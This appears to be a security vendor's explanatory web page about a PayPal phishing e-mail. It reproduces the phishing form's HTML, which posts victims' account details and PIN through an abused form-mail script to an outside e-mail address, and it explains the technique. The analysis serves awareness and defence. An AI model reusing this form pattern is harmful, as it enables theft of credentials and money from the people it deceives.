Click Here to
view an example of a typical "Phishing" page. This actually arrived in an e-mail, but is displayed
as a web page for demonstration purposes. I like how they actually have
the gall to ask for a PIN number as well! This allows them to program
a credit card or ATM card with your account information and go to the
bank to physically retrieve your funds.
Looking closely at the form, it reveals the following HTML code:
<form name=Order action=http://www.webhost4life.com/cgi-bin/ultra/ultra-mail.pl method=post>
<input type="hidden" name="XX-subject" value="Full Infoz Hacked" >
<input type="hidden" name="XX-send-to-email" value="brucehriver@hotmail.com"
>
<input type="hidden" name="XX-redirect-to-url"
value="http://www.PayPal.com.Account.Refreshing.Sucessful\
ahsfgSADFeaAWDAWasdasdWAadsadWAF\
AWdasdygfEASFeyeguASDFaerghaeDDFEasd\
fEAa@fire.prohosting.com/sniper47/Complete1.htm"
>
<input type="hidden" name=XX-name size=40 value="Hacked By Sn|p3rWo|f">
<input type="hidden" name=XX-email size=40 value="PayPal-Hacked@Full-Infoz-Hacked.com">
.......
There are a couple of things going on here.
First of all, the page is using all of its images from the actual PayPal site that is used
by PayPal to display images in proper PayPal e-mail messages. As a result, it looks extremely
authentic.
Second, the post is going to a web site that the hacker does not own. They have found a script
on 'WebHost4Life' that sends automated e-mail messages to an email address that is specified
in the form. (The script has since been removed.) The information is then sent to a hotmail
account, which is effectively untraceable. I wouldn't even be surprised if the hotmail account
is hacked or compromised as well.
Windows XP JPEG Overflow Exploit Tests
Click
here to view Customer Case Studies. |
Exploits
(Phishing) 
